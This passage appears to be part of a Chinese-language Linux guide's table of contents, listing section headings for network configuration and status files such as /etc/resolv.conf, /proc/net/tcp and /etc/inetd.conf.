1.4. `/etc/resolv.conf`

2.1. `/proc/net/tcp` 和 `/proc/net/udp`

2.2. `/proc/net/tcp6` 和 `/proc/net/udp6`

2.3. `/proc/net/unix`

4.1. `/etc/inetd.conf` 或 `/etc/xinetd.conf`